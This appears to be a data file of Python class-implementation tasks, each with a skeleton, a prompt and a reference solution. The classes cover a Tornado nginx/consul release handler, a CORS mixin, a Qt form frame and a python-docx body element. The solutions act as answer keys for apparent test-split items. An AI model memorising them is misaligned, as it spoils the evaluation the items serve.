"full_text": "<|skeleton|>\nclass ReadyHandler:\n\n def get(self, ident):\n \"\"\"获取预生产发布信息\"\"\"\n <|body_0|>\n\n def post(self, ident=0):\n \"\"\"预生产创建nginx及consul\"\"\"\n <|body_1|>\n\n def delete(self, ident):\n 
\"\"\"预生产删除nginx及consul\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n username = self.get_cookie('username')\n page = int(self.get_argument('page', 1))\n searchKey = self.get_argument('searchKey', None)\n pagesize = int(self.get_argument('pagesize', self._PageSize))\n totalquery = self.db.query(ReadyReleaseServer.Id)\n NgReleaseObj = self.db.query(ReadyReleaseServer)\n if searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n self.Result['total'] = totalquery.count()\n serverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\n self.Result['rows'] = list(map(lambda obj: obj.toDict(), serverTask))\n self.Result['username'] = username\n self.finish(self.Result)\n<|end_body_0|>\n\n<|body_start_1|>\n data = json.loads(self.request.body.decode('utf-8'))\n objTask = ReadyReleaseServer()\n domainname = data['params'].get('DomainName', None)\n objTask.name = ''.join(domainname.split('-'))\n objTask.DomainName = domainname + '.pdyf.open.com.cn'\n objTask.HealthExam = data['params'].get('HealthExam', None)\n objTask.Port = int(data['params'].get('Port', None))\n objTask.Publisher = self.get_cookie('username')\n self.db.add(objTask)\n self.db.commit()\n tasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\n self.Result['rows'] = 1\n self.Result['info'] = u'创建成功'\n self.finish(self.Result)\n<|end_body_1|>\n\n<|body_start_2|>\n pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\n domainname = pro.DomainName.split('.')[0]\n tasks.ready_Release_del.delay(domainname)\n self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\n self.db.commit()\n self.Result['info'] = u'删除nginx及consul成功'\n self.finish(self.Result)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000304", "length_bytes": 2915, "license_type": "no_license", "methods": [{"docstring": "获取预生产发布信息", "name": "get", "signature": "def get(self, ident)"}, {"docstring": "预生产创建nginx及consul", "name": "post", "signature": "def post(self, ident=0)"}, {"docstring": "预生产删除nginx及consul", "name": "delete", "signature": "def delete(self, ident)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001502", "prompt": "Implement the Python class `ReadyHandler` described below.\n\nClass description:\nImplement the ReadyHandler class.\n\nMethod signatures and docstrings:\n- def get(self, ident): 获取预生产发布信息\n- def post(self, ident=0): 预生产创建nginx及consul\n- def delete(self, ident): 预生产删除nginx及consul", "prompted_full_text": "Implement the Python class `ReadyHandler` described below.\n\nClass description:\nImplement the ReadyHandler class.\n\nMethod signatures and docstrings:\n- def get(self, ident): 获取预生产发布信息\n- def post(self, ident=0): 预生产创建nginx及consul\n- def delete(self, ident): 预生产删除nginx及consul\n\n<|skeleton|>\nclass ReadyHandler:\n\n def get(self, ident):\n \"\"\"获取预生产发布信息\"\"\"\n <|body_0|>\n\n def post(self, ident=0):\n \"\"\"预生产创建nginx及consul\"\"\"\n <|body_1|>\n\n def delete(self, ident):\n \"\"\"预生产删除nginx及consul\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n username = 
self.get_cookie('username')\n page = int(self.get_argument('page', 1))\n searchKey = self.get_argument('searchKey', None)\n pagesize = int(self.get_argument('pagesize', self._PageSize))\n totalquery = self.db.query(ReadyReleaseServer.Id)\n NgReleaseObj = self.db.query(ReadyReleaseServer)\n if searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n self.Result['total'] = totalquery.count()\n serverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\n self.Result['rows'] = list(map(lambda obj: obj.toDict(), serverTask))\n self.Result['username'] = username\n self.finish(self.Result)\n<|end_body_0|>\n\n<|body_start_1|>\n data = json.loads(self.request.body.decode('utf-8'))\n objTask = ReadyReleaseServer()\n domainname = data['params'].get('DomainName', None)\n objTask.name = ''.join(domainname.split('-'))\n objTask.DomainName = domainname + '.pdyf.open.com.cn'\n objTask.HealthExam = data['params'].get('HealthExam', None)\n objTask.Port = int(data['params'].get('Port', None))\n objTask.Publisher = self.get_cookie('username')\n self.db.add(objTask)\n self.db.commit()\n tasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\n self.Result['rows'] = 1\n self.Result['info'] = u'创建成功'\n self.finish(self.Result)\n<|end_body_1|>\n\n<|body_start_2|>\n pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\n domainname = pro.DomainName.split('.')[0]\n tasks.ready_Release_del.delay(domainname)\n self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\n self.db.commit()\n self.Result['info'] = u'删除nginx及consul成功'\n self.finish(self.Result)\n<|end_body_2|>\n", "revision_id": "827a2539f26048ee885882425a2e52a086e4caa4", "skeleton": "<|skeleton|>\nclass ReadyHandler:\n\n def get(self, ident):\n \"\"\"获取预生产发布信息\"\"\"\n <|body_0|>\n\n def post(self, ident=0):\n \"\"\"预生产创建nginx及consul\"\"\"\n <|body_1|>\n\n def delete(self, ident):\n \"\"\"预生产删除nginx及consul\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ReadyHandler:\n def get(self, ident):\n \"\"\"获取预生产发布信息\"\"\"\n username = self.get_cookie('username')\n page = int(self.get_argument('page', 1))\n searchKey = self.get_argument('searchKey', None)\n pagesize = int(self.get_argument('pagesize', self._PageSize))\n totalquery = self.db.query(ReadyReleaseServer.Id)\n NgReleaseObj = self.db.query(ReadyReleaseServer)\n if searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n self.Result['total'] = totalquery.count()\n serverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\n self.Result['rows'] = list(map(lambda 
obj: obj.toDict(), serverTask))\n self.Result['username'] = username\n self.finish(self.Result)\n\n def post(self, ident=0):\n \"\"\"预生产创建nginx及consul\"\"\"\n data = json.loads(self.request.body.decode('utf-8'))\n objTask = ReadyReleaseServer()\n domainname = data['params'].get('DomainName', None)\n objTask.name = ''.join(domainname.split('-'))\n objTask.DomainName = domainname + '.pdyf.open.com.cn'\n objTask.HealthExam = data['params'].get('HealthExam', None)\n objTask.Port = int(data['params'].get('Port', None))\n objTask.Publisher = self.get_cookie('username')\n self.db.add(objTask)\n self.db.commit()\n tasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\n self.Result['rows'] = 1\n self.Result['info'] = u'创建成功'\n self.finish(self.Result)\n\n def delete(self, ident):\n \"\"\"预生产删除nginx及consul\"\"\"\n pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\n domainname = pro.DomainName.split('.')[0]\n tasks.ready_Release_del.delay(domainname)\n self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\n self.db.commit()\n self.Result['info'] = u'删除nginx及consul成功'\n self.finish(self.Result)\n", "source": "the_stack_v2_python_sparse", "source_path": "Api/Release/Handler/ReadyReleaseHandler.py", "source_repo": "liuwei881/OpenPlatform", "split": "test", "star_events_count": 1} {"blob_id": "1a40a185be9faa62d8993704205fc718adb50486", "bodies": ["if self.CORS_ORIGIN:\n self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\nif self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)", "if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\nif self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\nelse:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\nif self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\nif self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\nif self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\nself.set_status(204)\nself.finish()", "supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\nmethods = []\nfor meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\nreturn ', '.join(methods)"], "bodies_text": "<|body_start_0|>\n if self.CORS_ORIGIN:\n self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\n if self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\n else:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\n if self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\n if self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n self.set_status(204)\n 
self.finish()\n<|end_body_1|>\n\n<|body_start_2|>\n supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\n methods = []\n for meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\n return ', '.join(methods)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "CorsMixin", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CorsMixin:\n\n def set_default_headers(self):\n \"\"\"设置默认头\"\"\"\n <|body_0|>\n\n def options(self, *args, **kwargs):\n \"\"\"写入跨域请求header\"\"\"\n <|body_1|>\n\n def _get_methods(self):\n \"\"\"设置支持的跨域方法\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.CORS_ORIGIN:\n self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\n if self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\n else:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\n if self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\n if self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n self.set_status(204)\n self.finish()\n<|end_body_1|>\n\n<|body_start_2|>\n supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\n methods = []\n for meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\n return ', '.join(methods)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000305", "length_bytes": 2506, "license_type": "permissive", "methods": [{"docstring": "设置默认头", "name": "set_default_headers", "signature": "def set_default_headers(self)"}, {"docstring": "写入跨域请求header", "name": "options", "signature": "def options(self, *args, **kwargs)"}, {"docstring": "设置支持的跨域方法", "name": "_get_methods", "signature": "def _get_methods(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007167", "prompt": "Implement the Python class `CorsMixin` described below.\n\nClass description:\nImplement the CorsMixin class.\n\nMethod signatures and docstrings:\n- def set_default_headers(self): 设置默认头\n- def options(self, *args, **kwargs): 写入跨域请求header\n- def _get_methods(self): 设置支持的跨域方法", "prompted_full_text": "Implement the Python class `CorsMixin` described below.\n\nClass description:\nImplement the CorsMixin class.\n\nMethod signatures and docstrings:\n- def set_default_headers(self): 设置默认头\n- def options(self, *args, **kwargs): 写入跨域请求header\n- def _get_methods(self): 设置支持的跨域方法\n\n<|skeleton|>\nclass CorsMixin:\n\n def set_default_headers(self):\n \"\"\"设置默认头\"\"\"\n <|body_0|>\n\n def options(self, *args, **kwargs):\n \"\"\"写入跨域请求header\"\"\"\n <|body_1|>\n\n def _get_methods(self):\n \"\"\"设置支持的跨域方法\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.CORS_ORIGIN:\n 
self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\n if self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\n else:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\n if self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\n if self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n self.set_status(204)\n self.finish()\n<|end_body_1|>\n\n<|body_start_2|>\n supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\n methods = []\n for meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\n return ', '.join(methods)\n<|end_body_2|>\n", "revision_id": "9999d70429d9f773501f9a11910997343ff2df93", "skeleton": "<|skeleton|>\nclass CorsMixin:\n\n def set_default_headers(self):\n \"\"\"设置默认头\"\"\"\n <|body_0|>\n\n def options(self, *args, **kwargs):\n \"\"\"写入跨域请求header\"\"\"\n <|body_1|>\n\n def _get_methods(self):\n \"\"\"设置支持的跨域方法\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CorsMixin:\n def set_default_headers(self):\n \"\"\"设置默认头\"\"\"\n if self.CORS_ORIGIN:\n self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n\n def options(self, *args, **kwargs):\n \"\"\"写入跨域请求header\"\"\"\n if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\n if self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\n else:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\n if self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\n if self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n self.set_status(204)\n self.finish()\n\n def _get_methods(self):\n \"\"\"设置支持的跨域方法\"\"\"\n supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\n methods = []\n for meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\n return ', '.join(methods)\n", "source": "the_stack_v2_python_sparse", "source_path": "api/common/helpers/tornado_cors.py", "source_repo": "bopopescu/smp", "split": "test", "star_events_count": 0} {"blob_id": "ef651b320319ae1796350323b512628639ff77ae", "bodies": ["super().__init__()\nself.item = item\nself.inputs = []\nself.input_changed = self._get_input_changed_func(main_window)\nhbox = QHBoxLayout()\nself.setLayout(hbox)\nhbox.setSpacing(0)\nrows = 5\nfor i, arg_name in 
enumerate(item):\n if i % rows == 0:\n try:\n vbox.addStretch(10)\n except NameError:\n pass\n vbox = QVBoxLayout()\n vbox.setSpacing(0)\n vbox.setContentsMargins(0, 0, 0, 0)\n hbox.addLayout(vbox)\n self.inputs.append(InputWidget(self, main_window, arg_name))\n vbox.addWidget(self.inputs[-1])\ntry:\n vbox.addStretch()\nexcept NameError:\n pass\nhbox.addStretch(100)", "def input_changed(label, value):\n self.item.set(label, value)\n self.item.calculate()\n for each in self.inputs:\n if label != each.label_text:\n each.set_value(self.item[each.label_text])\n main_window.input_changed(self.item)\nreturn input_changed"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.item = item\n self.inputs = []\n self.input_changed = self._get_input_changed_func(main_window)\n hbox = QHBoxLayout()\n self.setLayout(hbox)\n hbox.setSpacing(0)\n rows = 5\n for i, arg_name in enumerate(item):\n if i % rows == 0:\n try:\n vbox.addStretch(10)\n except NameError:\n pass\n vbox = QVBoxLayout()\n vbox.setSpacing(0)\n vbox.setContentsMargins(0, 0, 0, 0)\n hbox.addLayout(vbox)\n self.inputs.append(InputWidget(self, main_window, arg_name))\n vbox.addWidget(self.inputs[-1])\n try:\n vbox.addStretch()\n except NameError:\n pass\n hbox.addStretch(100)\n<|end_body_0|>\n\n<|body_start_1|>\n def input_changed(label, value):\n self.item.set(label, value)\n self.item.calculate()\n for each in self.inputs:\n if label != each.label_text:\n each.set_value(self.item[each.label_text])\n main_window.input_changed(self.item)\n return input_changed\n<|end_body_1|>\n", "class_docstring": "Frame represents attributes of a single item. Contains form layouts - labels and inputs", "class_name": "AttributesFrame", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AttributesFrame:\n \"\"\"Frame represents attributes of a single item. 
Contains form layouts - labels and inputs\"\"\"\n\n def __init__(self, main_window, item):\n \"\"\"main_window: MainWindow instance item: CalculableObject instance\"\"\"\n <|body_0|>\n\n def _get_input_changed_func(self, main_window):\n \"\"\"I don't want to keep reference to the MainWindow\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.item = item\n self.inputs = []\n self.input_changed = self._get_input_changed_func(main_window)\n hbox = QHBoxLayout()\n self.setLayout(hbox)\n hbox.setSpacing(0)\n rows = 5\n for i, arg_name in enumerate(item):\n if i % rows == 0:\n try:\n vbox.addStretch(10)\n except NameError:\n pass\n vbox = QVBoxLayout()\n vbox.setSpacing(0)\n vbox.setContentsMargins(0, 0, 0, 0)\n hbox.addLayout(vbox)\n self.inputs.append(InputWidget(self, main_window, arg_name))\n vbox.addWidget(self.inputs[-1])\n try:\n vbox.addStretch()\n except NameError:\n pass\n hbox.addStretch(100)\n<|end_body_0|>\n\n<|body_start_1|>\n def input_changed(label, value):\n self.item.set(label, value)\n self.item.calculate()\n for each in self.inputs:\n if label != each.label_text:\n each.set_value(self.item[each.label_text])\n main_window.input_changed(self.item)\n return input_changed\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000306", "length_bytes": 1723, "license_type": "no_license", "methods": [{"docstring": "main_window: MainWindow instance item: CalculableObject instance", "name": "__init__", "signature": "def __init__(self, main_window, item)"}, {"docstring": "I don't want to keep reference to the MainWindow", "name": "_get_input_changed_func", "signature": "def _get_input_changed_func(self, main_window)"}], "n_methods": 2, "prompt": "Implement the Python class `AttributesFrame` described below.\n\nClass description:\nFrame represents attributes of a single item. Contains form layouts - labels and inputs\n\nMethod signatures and docstrings:\n- def __init__(self, main_window, item): main_window: MainWindow instance item: CalculableObject instance\n- def _get_input_changed_func(self, main_window): I don't want to keep reference to the MainWindow", "prompted_full_text": "Implement the Python class `AttributesFrame` described below.\n\nClass description:\nFrame represents attributes of a single item. Contains form layouts - labels and inputs\n\nMethod signatures and docstrings:\n- def __init__(self, main_window, item): main_window: MainWindow instance item: CalculableObject instance\n- def _get_input_changed_func(self, main_window): I don't want to keep reference to the MainWindow\n\n<|skeleton|>\nclass AttributesFrame:\n \"\"\"Frame represents attributes of a single item. 
Contains form layouts - labels and inputs\"\"\"\n\n def __init__(self, main_window, item):\n \"\"\"main_window: MainWindow instance item: CalculableObject instance\"\"\"\n <|body_0|>\n\n def _get_input_changed_func(self, main_window):\n \"\"\"I don't want to keep reference to the MainWindow\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.item = item\n self.inputs = []\n self.input_changed = self._get_input_changed_func(main_window)\n hbox = QHBoxLayout()\n self.setLayout(hbox)\n hbox.setSpacing(0)\n rows = 5\n for i, arg_name in enumerate(item):\n if i % rows == 0:\n try:\n vbox.addStretch(10)\n except NameError:\n pass\n vbox = QVBoxLayout()\n vbox.setSpacing(0)\n vbox.setContentsMargins(0, 0, 0, 0)\n hbox.addLayout(vbox)\n self.inputs.append(InputWidget(self, main_window, arg_name))\n vbox.addWidget(self.inputs[-1])\n try:\n vbox.addStretch()\n except NameError:\n pass\n hbox.addStretch(100)\n<|end_body_0|>\n\n<|body_start_1|>\n def input_changed(label, value):\n self.item.set(label, value)\n self.item.calculate()\n for each in self.inputs:\n if label != each.label_text:\n each.set_value(self.item[each.label_text])\n main_window.input_changed(self.item)\n return input_changed\n<|end_body_1|>\n", "revision_id": "606e188e88ee3a2b2e1daee60c71948c678228e1", "skeleton": "<|skeleton|>\nclass AttributesFrame:\n \"\"\"Frame represents attributes of a single item. Contains form layouts - labels and inputs\"\"\"\n\n def __init__(self, main_window, item):\n \"\"\"main_window: MainWindow instance item: CalculableObject instance\"\"\"\n <|body_0|>\n\n def _get_input_changed_func(self, main_window):\n \"\"\"I don't want to keep reference to the MainWindow\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AttributesFrame:\n \"\"\"Frame represents attributes of a single item. 
Contains form layouts - labels and inputs\"\"\"\n\n    def __init__(self, main_window, item):\n        \"\"\"main_window: MainWindow instance item: CalculableObject instance\"\"\"\n        super().__init__()\n        self.item = item\n        self.inputs = []\n        self.input_changed = self._get_input_changed_func(main_window)\n        hbox = QHBoxLayout()\n        self.setLayout(hbox)\n        hbox.setSpacing(0)\n        rows = 5\n        for i, arg_name in enumerate(item):\n            if i % rows == 0:\n                try:\n                    vbox.addStretch(10)\n                except NameError:\n                    pass\n                vbox = QVBoxLayout()\n                vbox.setSpacing(0)\n                vbox.setContentsMargins(0, 0, 0, 0)\n                hbox.addLayout(vbox)\n            self.inputs.append(InputWidget(self, main_window, arg_name))\n            vbox.addWidget(self.inputs[-1])\n        try:\n            vbox.addStretch()\n        except NameError:\n            pass\n        hbox.addStretch(100)\n\n    def _get_input_changed_func(self, main_window):\n        \"\"\"I don't want to keep reference to the MainWindow\"\"\"\n        def input_changed(label, value):\n            self.item.set(label, value)\n            self.item.calculate()\n            for each in self.inputs:\n                if label != each.label_text:\n                    each.set_value(self.item[each.label_text])\n            main_window.input_changed(self.item)\n        return input_changed\n", "source": "the_stack_v2_python_sparse", "source_path": "Hospital-Helper-2-master/app/gui/attributes_frame.py", "source_repo": "JoaoBueno/estudos-python", "split": "test", "star_events_count": 2} {"blob_id": "962c4b48dd3108cc4e27acba5fc8af2cb7a8fd11", "bodies": ["sentinel_sectPr = self.get_or_add_sectPr()\ncloned_sectPr = sentinel_sectPr.clone()\np = self.add_p()\np.set_sectPr(cloned_sectPr)\nreturn sentinel_sectPr", "if self.sectPr is not None:\n    content_elms = self[:-1]\nelse:\n    content_elms = self[:]\nfor content_elm in content_elms:\n    self.remove(content_elm)"], "bodies_text": "<|body_start_0|>\n    sentinel_sectPr = self.get_or_add_sectPr()\n    cloned_sectPr = sentinel_sectPr.clone()\n    p = self.add_p()\n    p.set_sectPr(cloned_sectPr)\n    return sentinel_sectPr\n<|end_body_0|>\n\n<|body_start_1|>\n    if self.sectPr is not None:\n        content_elms = self[:-1]\n    else:\n        content_elms = self[:]\n    for content_elm in content_elms:\n        self.remove(content_elm)\n<|end_body_1|>\n", "class_docstring": "``<w:body>``, the container element for the main document story in ``document.xml``.", "class_name": "CT_Body", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CT_Body:\n    \"\"\"``<w:body>``, the container element for the main document story in ``document.xml``.\"\"\"\n\n    def add_section_break(self):\n        \"\"\"Return the current ``<w:sectPr>`` element after adding a clone of it in a new ``<w:p>`` element appended to the block content elements. Note that the \"current\" ``<w:sectPr>`` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\"\"\"\n        <|body_0|>\n\n    def clear_content(self):\n        \"\"\"Remove all content child elements from this element. 
Leave the <w:sectPr> element if it is present.\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    sentinel_sectPr = self.get_or_add_sectPr()\n    cloned_sectPr = sentinel_sectPr.clone()\n    p = self.add_p()\n    p.set_sectPr(cloned_sectPr)\n    return sentinel_sectPr\n<|end_body_0|>\n\n<|body_start_1|>\n    if self.sectPr is not None:\n        content_elms = self[:-1]\n    else:\n        content_elms = self[:]\n    for content_elm in content_elms:\n        self.remove(content_elm)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000307", "length_bytes": 1810, "license_type": "permissive", "methods": [{"docstring": "Return the current ``<w:sectPr>`` element after adding a clone of it in a new ``<w:p>`` element appended to the block content elements. Note that the \"current\" ``<w:sectPr>`` will always be the sentinel sectPr in this case since we're always working at the end of the block content.", "name": "add_section_break", "signature": "def add_section_break(self)"}, {"docstring": "Remove all content child elements from this element. Leave the <w:sectPr> element if it is present.", "name": "clear_content", "signature": "def clear_content(self)"}], "n_methods": 2, "prompt": "Implement the Python class `CT_Body` described below.\n\nClass description:\n``<w:body>``, the container element for the main document story in ``document.xml``.\n\nMethod signatures and docstrings:\n- def add_section_break(self): Return the current ``<w:sectPr>`` element after adding a clone of it in a new ``<w:p>`` element appended to the block content elements. Note that the \"current\" ``<w:sectPr>`` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\n- def clear_content(self): Remove all content child elements from this element. Leave the <w:sectPr> element if it is present.", "prompted_full_text": "Implement the Python class `CT_Body` described below.\n\nClass description:\n``<w:body>``, the container element for the main document story in ``document.xml``.\n\nMethod signatures and docstrings:\n- def add_section_break(self): Return the current ``<w:sectPr>`` element after adding a clone of it in a new ``<w:p>`` element appended to the block content elements. Note that the \"current\" ``<w:sectPr>`` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\n- def clear_content(self): Remove all content child elements from this element. Leave the <w:sectPr> element if it is present.\n\n<|skeleton|>\nclass CT_Body:\n    \"\"\"``<w:body>``, the container element for the main document story in ``document.xml``.\"\"\"\n\n    def add_section_break(self):\n        \"\"\"Return the current ``<w:sectPr>`` element after adding a clone of it in a new ``<w:p>`` element appended to the block content elements. Note that the \"current\" ``<w:sectPr>`` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\"\"\"\n        <|body_0|>\n\n    def clear_content(self):\n        \"\"\"Remove all content child elements from this element. 
